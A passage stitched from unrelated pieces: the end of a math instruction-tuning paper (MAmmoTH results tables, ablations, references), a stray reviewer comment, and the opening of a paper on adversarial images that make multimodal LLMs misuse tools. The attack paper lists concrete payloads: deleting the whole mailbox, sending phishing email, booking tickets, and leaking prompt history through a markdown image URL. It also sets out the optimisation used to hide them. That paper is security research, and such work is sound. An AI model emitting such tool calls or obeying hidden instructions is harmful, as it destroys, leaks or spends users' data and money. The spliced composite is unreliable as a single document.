| WizardMath | 36.1 | 9.3 | 12.8 | 25.4 | 31.1 | 28.6 |
| Toolformer | 29.4† | - | - | - | - | - |
| MAmmoTH | 67.7 | 46.3 | 41.2 | 42.7 | 42.6 | 48.1 |
| MAmmoTH-Coder | 71.4 | 55.4 | 45.9 | 40.5 | 48.3 | 52.3 |
| Δ | +22 | +34 | +33 | +14 | +17 | +24 |
| **13B Parameter Model** | | | | | | |
| Llama-1 | 34.7 | 6.9 | 5.4 | 27.7 | 30.7 | 21.0 |
| Llama-2 | 35.1 | 11.5 | 5.8 | 32.7 | 34.4 | 23.9 |
| Code-Llama (PoT) | 60.0 | 21.3 | 3.8 | 25.9 | 27.7 | 27.7 |
| Vicuna-1.5 | 55.7 | 10.0 | 6.6 | 34.0 | 34.1 | 28.1 |
| Llama-1 RFT | 46.5 | 6.7 | 10.1 | 13.2 | 21.6 | 19.6 |
| WizardMath | 51.9 | 14.1 | 14.9 | 24.5 | 32.1 | 27.5 |
| Platypus | 55.4 | 11.4 | 7.4 | 36.8 | 35.5 | 29.3 |
| Orca-Platypus | 56.8 | 12.6 | 7.9 | 29.5 | 41.6 | 29.7 |
| MAmmoTH | 72.4 | 49.2 | 43.2 | 46.8 | 47.6 | 51.8 |
| MAmmoTH-Coder | 73.7 | 61.5 | 47.1 | 48.6 | 48.3 | 55.8 |
| Δ | +14 | +40 | +33 | +12 | +7 | +26 |
| **30-34B Parameter Model** | | | | | | |
| Llama-1 | 48.8 | 12.8 | 11.2 | 33.4 | 39.0 | 29.0 |
| Code-Llama (PoT) | 69.1 | 34.5 | 6.8 | 26.8 | 21.6 | 31.7 |
| Llama-1 RFT | 55.4 | 7.6 | 12.8 | 20.4 | 37.9 | 26.8 |
| Galactica-30B | 41.6 | 11.8 | 13.2 | 37.7 | 37.9 | 28.4 |
| Tulu | 59.0 | 10.7 | 10.3 | 31.3 | 39.8 | 30.2 |
| Platypus | 51.7 | 13.8 | 13.6 | 38.6 | 41.0 | 31.7 |
| MAmmoTH-Coder | 84.3 | 65.4 | 51.8 | 60.9 | 53.8 | 63.2 |
| Δ | +15 | +31 | +38 | +22 | +13 | +32 |
| **65-70B Parameter Model** | | | | | | |
| Llama-1 | 55.3 | 14.2 | 15.2 | 37.4 | 44.1 | 33.2 |
| Llama-2 | 63.8 | 20.5 | 14.0 | 51.3 | 47.1 | 39.3 |
| Llama-2-Chat | 71.5 | 19.2 | 21.7 | 44.1 | 46.9 | 40.6 |
| WizardMath | 71.8 | 17.1 | 37.9 | 13.2 | 27.4 | 33.4 |
| Guanaco | 66.8 | 17.8 | 20.2 | 50.0 | 47.3 | 40.4 |
| Platypus | 51.8 | 26.3 | 21.7 | 55.9 | 52.5 | 41.6 |
| MAmmoTH | 82.4 | 55.6 | 51.4 | 66.4 | 56.7 | 62.5 |
| Δ | +11 | +29 | +14 | +11 | +4 | +21 |

Table 4: The table compiles all the out-of-domain evaluation results. Results marked as † are copied from other papers, which can be found on paperswithcode leaderboards.

Therefore, WizardMath's results are highly competitive on these two datasets. However, dataset-specific training can be detrimental to OOD datasets like AQuA. In contrast, Platypus fine-tunes LLMs on a wide range of text and math reasoning datasets and improves the open-source SoTA on several datasets. Similarly, MAmmoTH achieves universal improvement across the board. A major observation is that MAmmoTH is particularly strong at solving the more complex math problems in MATH, where the gain of our model over WizardMath (the open-source SoTA on MATH) exceeds 25% at different scales.
Figure 2: Investigation of the influence of CoT & PoT hybrid training on the 7B Llama-2 model. "Out-of-domain" refers to the five datasets detailed in Table 2. Key insights include: 1) the SoTA model, utilizing dataset-specific CoT fine-tuning on GSM and MATH, displays strong performance within its domains but struggles in OOD scenarios; 2) diverse data sources in MathInstruct enable a better math generalist model; 3) fine-tuning on the PoT subsets generally outperforms fine-tuning on the CoT subsets; 4) hybrid training yields the best-performing model. The breakdown results on each dataset can be found in Appendix Table 9.

From Table 4, we can observe that our main competitor on OOD datasets is Platypus (Lee et al., 2023). Similar to the in-domain results, Platypus yields gains over the baseline models universally across the board, especially on the MMLU-Math dataset, on which it is tied with MAmmoTH-70B. It is worth noting that the performance gains of our model on OOD datasets are even more significant than those on in-domain datasets, which demonstrates our models' remarkable generalizability to unseen math problems. Notably, MAmmoTH-7B also exceeds the CoT performance of WizardMath-7B on MMLU-Math by 9%, even though MMLU-Math contains a substantial number of questions beyond the subjects covered in our training dataset.

**Comparison between Different Base Models.** In our experiments, we used both Llama-2 and Code-Llama as the base models. From the two tables, we can observe that Code-Llama is consistently better than Llama-2, especially on OOD datasets; the gap between MAmmoTH and MAmmoTH-Coder can reach up to 5%. Surprisingly, the average OOD performance of MAmmoTH-Coder (34B) is actually higher than that of MAmmoTH (70B). We believe MAmmoTH-Coder benefits greatly from the continued code training of Code-Llama, which not only enhances its PoT capabilities but also improves Llama's general reasoning skills.

3.4 Ablation Study on Data Source

**Ablation of the Data Source.** In order to better understand what factors contribute to the large gain of MAmmoTH over existing baselines, we set up a group of control experiments in Figure 2. We study the following setups:

(1) MAmmoTH (MathInstruct - CoT): This experiment aims to understand how much our curated CoT data improves generalization over the SoTA model WizardMath (Luo et al., 2023), trained specifically on GSM + MATH. As can be seen, while sacrificing accuracy on GSM + MATH by 3%, our CoT subset fine-tuning improves the overall nine-dataset accuracy from 27% to 32%.

(2) MAmmoTH (MathInstruct - PoT): This experiment aims to understand the advantage of our PoT subset. As can be observed, our PoT subset fine-tuning significantly improves the overall accuracy from 27% to 41%. This ablation reflects the importance of unlocking the program generation capabilities of our model.

(3) MAmmoTH (MathInstruct - Hybrid): We further combine CoT and PoT as hybrid training data to achieve the best overall performance of 47.9%. This combined gain comes from two aspects:

• The CoT subset helps maintain generic language-based reasoning skills to handle scenarios that PoT cannot handle well, e.g., abstract reasoning multi-choice questions in AQuA and MMLU.
• The PoT subset can teach the model how to utilize Python APIs to solve complex math problems with high precision, e.g., the MATH problems requiring complex computation (a sketch of such a rationale is shown below).
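As an illustration of that last point, a PoT rationale can offload exact computation to a symbolic library such as sympy. The following is a hypothetical, minimal example written in the spirit of MathInstruct's program rationales, not an actual sample from the dataset:

```python
from sympy import symbols, solve

# Question: find the sum of the roots of 2x^2 - 5x + 3 = 0.
x = symbols("x")
roots = solve(2 * x**2 - 5 * x + 3, x)  # exact symbolic roots: [1, 3/2]
answer = sum(roots)                      # 5/2, matching -b/a = 5/2 exactly
print(answer)
```

Because the arithmetic is delegated to the interpreter, the model only has to produce correct code, not correct digit-by-digit calculation.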
| Training Data | GSM | MATH | AQuA | NumG | SVA | Mat | Sim | SAT | MMLU | AVG | |---------------|-----|------|------|------|-----|-----|-----|-----|------|-----| | - | 14.6| 2.5 | 30.3 | 29.9 | 34.5| 6.0 | 5.0 | 26.8| 29.8 | -25.3| | G | 56.6| 9.2 | 24.4 | 32.1 | 65.4| 20.5| 12.3| 27.2| 25.2 | 30.3 | | M | 27.1| 25.5 | 27.8 | 32.1 | 47 | 49.4| 10.5| 26.4| 27.4 | 30.4 | | A | 15.3| 5.8 | 39.7 | 15.5 | 15.3| 6.3 | 7.2 | 32.7| 36.6 | 19.4 | | G + M | 58.1| 28.2 | 26.0 | 34.7 | 64.8| 50.1| 17.1| 28.6| 28.4 | 37.3 | | G + M + T | 56.5| 26.5 | 27.4 | 35.5 | 64.4| 50.6| 18.8| 29.1| 29.1 | 37.5 | | G + M + C | 57.4| 28.5 | 26.2 | 37.5 | 65.3| 50.4| 17.7| 29.3| 28.7 | 37.9 | | G + M + A | 56.1| 27.1 | 37.8 | 37.2 | 64.8| 48.2| 19.8| 35.4| 39.8 | 40.7 | | G + M + C + A | 57.5| 29.1 | 46.9 | 42.2 | 65.8| 49.6| 32.7| 42.3| 43.1 | 45.5 | | M + C + A + N | 24.7| 26.1 | 39.4 | 59.7 | 61.6| 48.6| 43.4| 36.4| 41.2 | 42.3 | | G + M + C + N | 50.8| 26.2 | 20.9 | 65.5 | 65.8| 48.5| 41.4| 26.4| 24.7 | 41.1 | | G + C + A + N | 51.3| 14.8 | 41.7 | 58.8 | 66.3| 31.0| 42.2| 34.1| 40.5 | 42.3 | | G + M + C + A + T | 55.4| 28.6 | 42.5 | 44.9 | 65.4| 50.8| 34.9| 41.3| 42.5 | 45.1 | | G + M + C + A + N | 56.5| 28.9 | 38.2 | 63.7 | 64.1| 47.9| 40.8| 38.6| 44.5 | 47.0 | | G + M + C + A + N + T | 53.8| 27.0 | 38.2 | 60.8 | 65.9| 50.8| 41.8| 42.5| 42.7 | 47.1 | | G + M + C + A + N + MQA | 55.7| 28.8 | 42.5 | 62.1 | 64.6| 45.9| 38.9| 41.3| 45.0 | 47.2 | | MathInstruct | 53.6| 31.5 | 44.5 | 61.2 | 67.7| 46.3| 41.2| 42.7| 42.6 | 47.9 | Table 5: Influence of different major subsets in MathInstruct based on Llama-2 7B. G: GSM8K, M: MATH, C: Camel, A: AQuA, N: NumGLUE, MQA: MathQA. “Existing data”: the subset of MathInstruct in Table 1 by excluding all the NEW rationales curated by us. We shorten Mathematics as Mat, SimulEq as Sim, NumGLUE as NumG, and SVAMP as SVA to save space. We put some case studies in Appendix B to demonstrate the respective advantages of PoT and CoT in solving different types of math problems. To summarize, we attribute our substantial gain to: 1) diverse data sources covering different math fields and complexity levels and 2) a hybrid of CoT & PoT instruction tuning and decoding strategy. **Influence of Major Subsets.** Given the diverse sources of MathInstruct used in training MAmmoTH, it is important to understand how each dataset contributes to the overall performance of the model. We focus on five significant subsets: GSM8K, MATH, Camel, AQuA, and NumGLUE. We conduct an experiment gradually adding each dataset into training and compare the performance with the one fine-tuned on the whole MathInstruct. These results underscore the significant impact of diverse data sources on MAmmoTH performance, a core aspect of making MAmmoTH a math generalist. The results also provide valuable insights for future data curation and collection efforts (e.g., we should always collect diverse data and avoid collecting only specific types of data). To help understand the contribution of the 6 newly curated datasets as shown in Table 1, we remove them from MathInstruct, and train a model on the existing data. As shown in the last two rows of Table 5, our new curated data substantially improves the performance on many datasets and leads to a 9% overall increase, which reflects the importance of the NEWLY curated dataset. **Influence of Hybrid Decoding.** To demonstrate the effectiveness of the hybrid decoding method, we conduct an experiment as outlined in subsection 2.3. 
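For concreteness, a minimal sketch of this fallback heuristic is given below; `model.generate` is a hypothetical stand-in for the model's decoding interface, and the trigger phrase is the one introduced in subsection 2.3:

```python
POT_TRIGGER = " Let's write a program to solve the problem."

def try_execute(program: str):
    """Run a generated program; return its `answer` variable, or None on failure.
    (The `answer`-variable convention is an assumption for illustration.)"""
    scope = {}
    try:
        exec(program, scope)
        return scope.get("answer")
    except Exception:
        return None

def hybrid_decode(model, question: str):
    """Hybrid decoding: attempt PoT first, fall back to CoT if it cannot run."""
    program = model.generate(question + POT_TRIGGER)  # PoT attempt via trigger phrase
    result = try_execute(program)
    if result is not None:
        return result
    return model.generate(question)                   # default CoT decoding
```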
As described in subsection 2.3, we initially attempt the PoT decoding method for a given question; if it fails to generate an executable query, we then transition to the CoT decoding method. The performance of the different decoding methods (CoT, PoT, and Hybrid) is shown in Table 10. Hybrid decoding improves performance on every test set, showcasing that our model can effectively leverage the strengths of both the CoT and PoT decoding strategies.

## 4 Conclusion

In this paper, we propose a novel math instruction tuning approach to activate open-source LLMs' mathematical reasoning capabilities. Through a comprehensive study, we show that our models can outperform the SoTA performance at different scales by a large margin. Our models benefit massively from: 1) the broad coverage of different math fields and complexity levels, and 2) a hybrid of CoT and PoT training. Our instruction tuning dataset contains 260K samples, which makes fine-tuning highly affordable even for academic labs. Our work paves the way for future studies to activate LLMs' core capabilities in specialized domains.

REFERENCES

Aida Amini, Saadia Gabriel, Shanchuan Lin, Rik Koncel-Kedziorski, Yejin Choi, and Hannaneh Hajishirzi. MathQA: Towards interpretable math word problem solving with operation-based formalisms. In Proceedings of the 2019 Conference of the North American Chapter of the Association for Computational Linguistics: Human Language Technologies, Volume 1 (Long and Short Papers), pp. 2357–2367, 2019. doi: 10.18653/v1/N19-1245. URL https://aclanthology.org/N19-1245.

Rohan Anil, Andrew M Dai, Orhan Firat, Melvin Johnson, Dmitry Lepikhin, Alexandre Passos, Siamak Shakeri, Emanuel Taropa, Paige Bailey, Zhifeng Chen, et al. Palm 2 technical report. ArXiv preprint, abs/2305.10403, 2023. URL https://arxiv.org/abs/2305.10403.

Yuntao Bai, Saurav Kadavath, Sandipan Kundu, Amanda Askell, Jackson Kernion, Andy Jones, Anna Chen, Anna Goldie, Azalia Mirhoseini, Cameron McKinnon, et al. Constitutional ai: Harmlessness from ai feedback. ArXiv preprint, abs/2212.08073, 2022. URL https://arxiv.org/abs/2212.08073.

Mark Chen, Jerry Tworek, Heewoo Jun, Qiming Yuan, Henrique Ponde de Oliveira Pinto, Jared Kaplan, Harri Edwards, Yuri Burda, Nicholas Joseph, Greg Brockman, et al. Evaluating large language models trained on code. ArXiv preprint, abs/2107.03374, 2021. URL https://arxiv.org/abs/2107.03374.

Wenhu Chen, Xueguang Ma, Xinyi Wang, and William W Cohen. Program of thoughts prompting: Disentangling computation from reasoning for numerical reasoning tasks. ArXiv preprint, abs/2211.12588, 2022. URL https://arxiv.org/abs/2211.12588.

Wenhu Chen, Ming Yin, Max Ku, Elaine Wan, Xueguang Ma, Jianyu Xu, Tony Xia, Xinyi Wang, and Pan Lu. Theoremqa: A theorem-driven question answering dataset. ArXiv preprint, abs/2305.12524, 2023. URL https://arxiv.org/abs/2305.12524.

Hyung Won Chung, Le Hou, Shayne Longpre, Barret Zoph, Yi Tay, William Fedus, Eric Li, Xuezhi Wang, Mostafa Dehghani, Siddhartha Brahma, et al. Scaling instruction-finetuned language models. ArXiv preprint, abs/2210.11416, 2022. URL https://arxiv.org/abs/2210.11416.

Karl Cobbe, Vineet Kosaraju, Mohammad Bavarian, Mark Chen, Heewoo Jun, Lukasz Kaiser, Matthias Plappert, Jerry Tworek, Jacob Hilton, Reiichiro Nakano, et al. Training verifiers to solve math word problems. ArXiv preprint, abs/2110.14168, 2021. URL https://arxiv.org/abs/2110.14168.
Alex Davies, Petar Veličković, Lars Buesing, Sam Blackwell, Daniel Zheng, Nenad Tomašev, Richard Tanburn, Peter Battaglia, Charles Blundell, András Juhász, et al. Advancing mathematics by guiding human intuition with ai. Nature, 600(7887):70–74, 2021. URL https://www.nature.com/articles/s41586-021-04086-x.

Tim Dettmers, Artidoro Pagnoni, Ari Holtzman, and Luke Zettlemoyer. Qlora: Efficient finetuning of quantized llms. ArXiv preprint, abs/2305.14314, 2023. URL https://arxiv.org/abs/2305.14314.

Andrew Drozdov, Nathanael Schärli, Ekin Akyürek, Nathan Scales, Xinying Song, Xinyun Chen, Olivier Bousquet, and Denny Zhou. Compositional semantic parsing with large language models. International Conference on Learning Representations (ICLR), 2023. URL https://openreview.net/forum?id=gJW8hSGBys8.

Luyu Gao, Aman Madaan, Shuyan Zhou, Uri Alon, Pengfei Liu, Yiming Yang, Jamie Callan, and Graham Neubig. Pal: Program-aided language models. In International Conference on Machine Learning, pp. 10764–10799. PMLR, 2023. URL https://proceedings.mlr.press/v202/gao23f/gao23f.pdf.

Zhibin Gou, Zhihong Shao, Yeyun Gong, Yelong Shen, Yujiu Yang, Nan Duan, and Weizhu Chen. Critic: Large language models can self-correct with tool-interactive critiquing. ArXiv preprint, abs/2305.11738, 2023. URL https://arxiv.org/abs/2305.11738.
djcciHhCrt
Additionally, the authors claim that the attack is stealthy because it does not alter the semantic meanings of the output answers. They support this claim with the evidence that the answers under attack are 10% less natural compared to the original ones. My question is, why is a 10% difference considered a small one?
MISUSING TOOLS IN LARGE LANGUAGE MODELS WITH VISUAL ADVERSARIAL EXAMPLES Anonymous authors Paper under double-blind review ABSTRACT Large Language Models (LLMs) are being enhanced with the ability to use tools and to process multiple modalities. These new capabilities bring new benefits and also new security risks. In this work, we show that an attacker can use visual adversarial examples to cause attacker-desired tool usage. For example, the attacker could cause a victim LLM to delete calendar events, leak private conversations and book hotels. Different from prior work, our attacks can affect the confidentiality and integrity of user resources connected to the LLM while being stealthy and generalizable to multiple input prompts. We construct these attacks using gradient-based adversarial training and characterize performance along multiple dimensions. We find that our adversarial images can manipulate the LLM to invoke tools following real-world syntax almost always (~98%) while maintaining high similarity to clean images (~0.9 SSIM). Furthermore, using human scoring and automated metrics, we find that the attacks do not noticeably affect the conversation (and its semantics) between the user and the LLM. 1 INTRODUCTION Conversational Large Language Models (LLMs) exhibit state-of-the-art performance on tasks that require natural language understanding, reasoning, and problem-solving. To enhance their capabilities, model developers have begun augmenting LLMs with third-party extensions, tools, and plugins (OpenAI, 2023a; Rajesh Jha, 2023; AutoGPT, 2023; Yury Pinsky, 2023) and also with the ability to understand images and sound (OpenAI, 2023d). Furthermore, frameworks like LangChain (LangChain, 2023) and Guidance (Microsoft, 2023a) facilitate development of such integrations. These enhanced LLMs can retrieve up-to-date information from the Internet and achieve more complex tasks such as flight reservations and email management. Unfortunately, these multimodal tool-enhanced LLMs face new security threats with the broadened resources and privileges they can access — a misbehaving model now has the potential to affect user resources that are integrated with the LLM. For example, the LLM is able to delete a user’s calendar, email sensitive conversation history to the attacker, or cause financial harm to the user by booking hotels. We observe that such problems are more security-relevant (i.e., having real impacts on the confidentiality and integrity of user resources) compared to other widely-discussed vulnerabilities such as “jailbreaking” (i.e., an LLM producing content that violates broadly accepted human values). A growing line of work has started exploring attacks on LLMs. For example, textual prompt-injection attacks manipulate the LLM to exfiltrate user data or call integrated tools in ways that are inconsistent with user expectations (Greshake et al., 2023; Samoilenko, 2023). These works embed malicious text instructions on the web, hoping that an unsuspecting user might simply ask the LLM to summarize an attacker-controlled webpage and cause the LLM to accidentally ingest and operate on those instructions. Such attacks are security-relevant but are not stealthy — a security-conscious user can detect the presence of unrelated instructions by examining the prompt history. Another line of work uses gradient information to compute adversarial examples (Bagdasaryan et al., 2023; Zou et al., 2023) attacking specific prompts. For instance, Bagdasaryan et al. 
(2023) show that when the user enters a pre-defined prompt (e.g., "describe the image") together with the adversarial image, a multimodal LLM will output attacker-specified text (e.g., "From now on I will always mention the word: cow"). This style of attack only works for the specific prompt it is optimized on, not for other general user inputs. It is also not stealthy, because the response of the LLM is unexpected. Carlini et al. (2023) and Qi et al. (2023) also show that adversarial images can successfully bypass model alignment, achieving jailbreak. Although these prior works demonstrate that attacking a non-text modality can be destructive to the language model, none of them are security-relevant, because user resources are unaffected. They do, however, show the potential of utilizing non-text modalities to stealthily embed malicious instructions that could manipulate a user's external resources.

Motivated by the above discussion, we observe the following gap: existing attacks are not simultaneously security-relevant and stealthy. Our work closes this gap in the attack space by proposing a white-box image-based attack against multimodal LLMs. Attackers can craft trojan-like images that instruct the victim LLM to invoke attacker-specified tools¹ or external API calls. Commercial LLMs like ChatGPT (OpenAI, 2023a) and Google Bard (Yury Pinsky, 2023) invoke the integrated tools by detecting whether the model responds with the specific syntax format of a tool. Once outputs pass the format check, they are directly processed as function calls. Figure 1 presents an example of our attack that simulates real-world scenarios. We observe that the adversarial image looks normal and the conversation remains reasonable and natural across different user inputs. Also, observe that the attack "harms" the user by abusing the email tool. Specifically, our attack has the following properties:

- **Tool-abusing:** The attack manipulates the LLM into taking sensitive actions on a user's resources (e.g., deleting a user's mailbox) by precisely invoking integrated tools with complex, non-natural-language syntax. This makes it security-relevant.
- **Stealthy:** A security-conscious user examining the input prompt will not be able to easily determine whether an attack can occur, because the image has imperceptible perturbations. Furthermore, the attack remains stealthy after the LLM ingests the prompt, because the attack maintains response utility (i.e., the conversation between the user and the LLM remains reasonable, natural, and indistinguishable from conversations when no attack is present).
- **Generalizable:** The attack works across different prompts, both related and unrelated to the image. This is important because, in the real world, the prompt is under the user's control; an attack should not assume specific prompts.

We observe that our attack does not violate safety alignment: using tools/plugins is a natural and expected behavior of LLMs. Our work also highlights an important shortcoming in current definitions of alignment. Most current efforts focus on broadly applicable human values, yet user- and task-specific misalignment can occur through attacks like ours. Detecting and preventing such misalignment requires fine-grained information about a specific user's intentions, which is typically unavailable during alignment efforts with current techniques, e.g., RLHF (Stiennon et al., 2020).

¹For brevity, we refer to all three categories as "tools" in the rest of this paper.
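To make the invocation mechanism concrete, the sketch below shows a simplified dispatcher in the spirit of the syntax-matching step described above, patterned on the `<function.name arg="...">` format listed in Table 1 below; the regex and the handler registry are illustrative stand-ins, not actual framework code:

```python
import re

# Matches e.g. <function.delete_email which="all">
FUNC_CALL = re.compile(r'<function\.(\w+)((?:\s+\w+="[^"]*")*)\s*>')
ARG = re.compile(r'(\w+)="([^"]*)"')

def scan_and_dispatch(model_output: str, tools: dict) -> str:
    """Find tool-invocation strings in the model output and execute them.
    The matched spans are stripped so the user never sees them."""
    for match in FUNC_CALL.finditer(model_output):
        name, raw_args = match.group(1), match.group(2)
        kwargs = dict(ARG.findall(raw_args))
        if name in tools:                      # syntax match => direct execution
            tools[name](**kwargs)
    return FUNC_CALL.sub("", model_output)     # rendered text excludes the call

# Example usage with a hypothetical handler:
# tools = {"delete_email": lambda which: print(f"deleting {which} emails")}
# scan_and_dispatch('Sure! <function.delete_email which="all">', tools)
```

This illustrates why the attack is dangerous: any model output that passes the format check is executed directly, regardless of whether the user intended it.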
Table 1: Different variants of attacks and the corresponding tool invocation syntaxes. Note that in the last attack, the string in red is not fixed but is a copy of the user prompt history. We have taken these syntax examples from real-world systems that integrate LLMs with tools.

| Attack Objective | Target Tool Invocation Instruction |
|------------------|-----------------------------------|
| delete_email | <function.delete_email which="all"> |
| send_email | <function.send_email input="I wish you a merry Christmas!" to="[email protected]"> |
| send_email_hard | <function.send_email_hard input="Free Costco Membership, click here https://tinyurl.com/nhyd8rb4" to="[email protected]"> |
| book_ticket | REQUEST TO EXPEDIA { "user_input_in_english": "Book a ticket from San Diego to Seattle on October 25", "keywords": "book\|ticket\|san diego\|seattle\|october 25", "origin": "San Diego", "destination": "Seattle", "departure_date": "2023-10-25" } |
| md_url_query | ![a](https://tinyurl.com/nhyd8rb4?p=How%20far%20is%20Earth%20from%20the%20Moon) |

To achieve the aforementioned properties of our attack, we adopt traditional gradient-based adversarial training (Goodfellow et al., 2014), which optimizes the adversarial image in a continuous space. First, we design a training loss that decomposes the generation objective in order to maintain normal conversation responses while injecting malicious tool usage. We also incorporate an image regularization term to control the adversarial image quality. This novel loss function balances image and response stealthiness against the success rate of making function calls/tool invocations. Second, we construct prompt-response training pairs to enable attack generalization to unseen prompts. We query GPT-4 to generate image-related questions, acquire image-unrelated questions from the Alpaca instruction dataset (Taori et al., 2023), and obtain responses from the target model.

Contributions. (1) We propose a stealthy, security-relevant white-box attack that causes multimodal LLMs to invoke attacker-desired tools. These attacks have real impacts on the confidentiality and integrity of user resources, and they close a gap in the literature relating to realistic attacks on LLMs. (2) We characterize the performance of this attack using both human-based and automated metrics for stealthiness and success rates (see details in Section 4).

2 SYSTEM AND THREAT MODEL

The attacker targets a user and their victim LLM that is integrated with tools. The LLM is trained to generate text following specific tool-invocation syntax, with arguments it infers from the user. A framework wrapping the LLM proactively scans the model outputs and executes the corresponding tool when a syntax match is found (e.g., ChatGPT, Microsoft Semantic Kernel). This segment of tool-invocation text is not printed out and is invisible to users. We assume that the user and the victim LLM are benign, similar to Greshake et al. (2023); Samoilenko (2023). Note that this setting is distinct from attacks where the user is malicious, such as those of Zou et al. (2023) and Maus et al. (2023). The attacker's motivation is to compromise the confidentiality and integrity of user resources that are connected to the LLM. For example, the attacker could cause financial harm to a user by reserving hotels or could delete user data. We further assume that the attacker has white-box access to the (weights of the) victim LLM.
This assumption is reasonable, as there is a range of open-source LLMs (e.g., LLaMA, Vicuna, StarCoder). Furthermore, recent work has demonstrated the black-box transferability of attacks to open-source models (Qi et al., 2023; Zou et al., 2023) and also to closed models like GPT and Bard (Zou et al., 2023). While we do not examine the transferability of our attacks, we note it as important future work.

There are several methods to deliver the attack to the user. For example, the attacker may share the adversarial image on social media and lure users to play with it (e.g., "Try 'Describe this image' on your LLM"), or they may embed the adversarial image in webpages that the LLM could read accidentally while browsing the Internet. At this point, the attack image is injected into the victim LLM. A successful attack must achieve the attacker-desired tool abuse and must also satisfy the following properties to remain disguised enough for a long-lasting spread: (1) Stealthy: the image appears benign to a human, and the conversation has good response utility (i.e., the conversation with the attack present remains reasonable and natural, and indistinguishable from clean conversations with humans); and (2) Generalizable: the attack works across a range of input prompts. More related work is discussed in Appendix A.1.

3 ADVERSARIAL IMAGE OPTIMIZATION

The goal of our attack is to find an adversarial image that can stealthily trigger attacker-desired malicious tool invocation while generalizing to any prompt that a user might provide. Our attack uses the insight that in a multimodal LLM, the image prompt is vulnerable to gradient-based adversarial training that optimizes in a continuous space (Goodfellow et al., 2014). In this section, we discuss the design of the training objective that balances stealthiness and attack success rate. In Section 4.1, we discuss how to construct a prompt-response training set to achieve the generalization property of our attack.

3.1 ATTACK VARIANTS

We consider five attacks with distinct attack objectives, corresponding to five different levels of complexity in the instructions required for tool invocation. We list the details of these attack objectives in Table 1, and we use exactly the same function-call syntax that commercial LLMs use. For the first three attack objectives, i.e., delete_email, send_email, and send_email_hard, the invocation instructions have similar syntax (same prefix and keyword arguments) but require an increasing amount of non-natural-language text, which indicates an increasing difficulty in producing these attacks under our assumptions. The instructions here follow the function-call syntax specified by Microsoft (2023b). For the fourth attack objective, book_ticket, the instruction is a more complicated JSON object whose syntax contains many special characters, making it more challenging. This instruction follows ChatGPT's call syntax for the Expedia plugin (OpenAI, 2023b). For the last attack objective, md_url_query, the instruction involves a component (the query string in the URL) that is a copy of the previous user inputs, URL-encoded, representing the conversation history. Such copy-and-encode behavior is extremely difficult for the LLM to produce, making this the most challenging of the five. The syntax here follows a standard markdown image href that ChatGPT supports natively, as inspired by Samoilenko (2023).
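For concreteness, the payload that the md_url_query attack forces the model to emit can be reproduced as follows; the URL is the attacker endpoint shown in Table 1, and rendering the markdown triggers a GET request that leaks the URL-encoded prompt history:

```python
from urllib.parse import quote

def md_url_payload(prompt_history: str) -> str:
    """Build the markdown image string the md_url_query attack forces the model
    to emit; rendering it issues a GET request carrying the user's prompt."""
    return f"![a](https://tinyurl.com/nhyd8rb4?p={quote(prompt_history)})"

print(md_url_payload("How far is Earth from the Moon"))
# ![a](https://tinyurl.com/nhyd8rb4?p=How%20far%20is%20Earth%20from%20the%20Moon)
```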
3.2 ATTACK OBJECTIVE

As shown in Figure 2, our attack targets mainstream off-the-shelf multimodal LLMs that respond with text or intrinsic instructions for tool invocation based on text and image prompts. Let $M$ denote the LLM and let $(c, x, y)$ denote an input-output tuple. Generally, $M$ takes as input a text prompt $c$ and an image $x$, and outputs a response sequence $y = M(c, x)$ through a search algorithm (e.g., beam search or sampling) based on the trained probabilistic model. The attack goal is to train a small perturbation $\delta$ to apply to the original image so that the model generates certain outputs specified by the attacker, namely, a desired output $y' = M(c, x + \delta)$. To camouflage our attack, $y'$ is constructed as the concatenation of the normal response $y$ and $y_{adv}$, a malicious instruction that the attacker intends to trigger. Generally speaking, the training objective can be written as minimizing the negative log probability of generating the target $y'$, parameterized by model weights $\theta$: $-\log P_\theta(y'|c, x + \delta)$.

3.3 ATTACK STEALTHINESS TRADE-OFF

The stealthiness of our attack is two-fold: (1) the attack image should look similar to the original one, and (2) apart from the attack payload for tool invocations, the text response should otherwise be a reasonable reply to the prompt. Intuitively, achieving stealthiness inevitably harms the attack success rate, so we describe how the trade-off is handled in our objective function.

Figure 2: Overall architecture of our attack method. We train the targeted image using gradient-based optimization, and separate the loss term into three components, aiming at keeping perturbations imperceptible, maintaining response utility, and achieving malicious behavior, respectively.

To ensure the quality of the adversarial image, $\delta$ needs to be as small as possible. We apply an additional $\ell_2$ regularization term to the objective, which plays a role similar to the projection step of the Projected Gradient Descent attack (Madry et al., 2017), which projects the gradient step onto an $L_p$ norm ball. Note that the $\ell_2$ norm of $\delta$ is computed with regard to each color channel separately, and its contribution is controlled by $\lambda_i$. The objective of adversarial training is then written as:

$$\min_{\delta} - \log P_\theta(y' | c, x + \delta) + \lambda_i \|\delta\|_2 \quad (1)$$

In the current loss function, we are using a hard target of $y' = [y; y_{adv}]$ to ensure response stealthiness. This is challenging because $y_{adv}$ is mainly non-natural syntax, and forcing the output to contain exactly the normal response $y$ can make convergence difficult or can harm the stealthiness of $\delta$. In real-world conversational systems, users will tolerate various responses to their prompts as long as they seem natural and reasonable. However, users can easily sense something is wrong if the injected malicious instruction does not fully comply with the format of function calls: this failure will make the attack tokens appear in the rendered model response. To minimize the chances of this happening, we reduce the contribution of the loss term corresponding to $y$ (i.e., the normal response to the user's prompt).
We modify (1) and weigh the cross-entropy losses for $y$ and $y_{adv}$ separately:

$$\min_{\delta} - \log P_\theta(y_{adv} | y, c, x + \delta) - \lambda_r \log P_\theta(y | c, x + \delta) + \lambda_i \|\delta\|_2. \quad (2)$$

In this equation, the log probability of generating the adversarial instruction $y_{adv}$ is conditioned on both the prompt and the normal response. We use $\lambda_r$ to control the trade-off of the supervision from the ground-truth response. We summarize the architecture of our attack in Figure 2.

Training Details. To effectively train $\delta$ so that it generalizes to arbitrary text prompt sequences, we create a training dataset $D$ containing multiple pairs $\{(c_j, y_j)\}$, where $y_j$ is the normal response of $M$ given prompt $c_j$ and $x$. The objective is to optimize over all the prompts jointly:

$$\min_{\delta} \frac{1}{|D|} \sum_j \left(- \log P_\theta(y_{adv} | [c_j; y_j], x + \delta) - \lambda_r \log P_\theta(y_j | c_j, x + \delta)\right) + \lambda_i \|\delta\|_2. \quad (3)$$

We introduce the details of how we construct $D$ in Section 4.1. We adopt the Adam optimizer (Kingma & Ba, 2014) to solve the optimization problem, which accelerates convergence and yields better results. The learning rate of the optimizer is denoted as $\alpha$ and tuned in our experiments, while the other hyperparameters of the optimizer are left at their defaults ($\beta_1 = 0.9$ and $\beta_2 = 0.999$).

4 EVALUATION

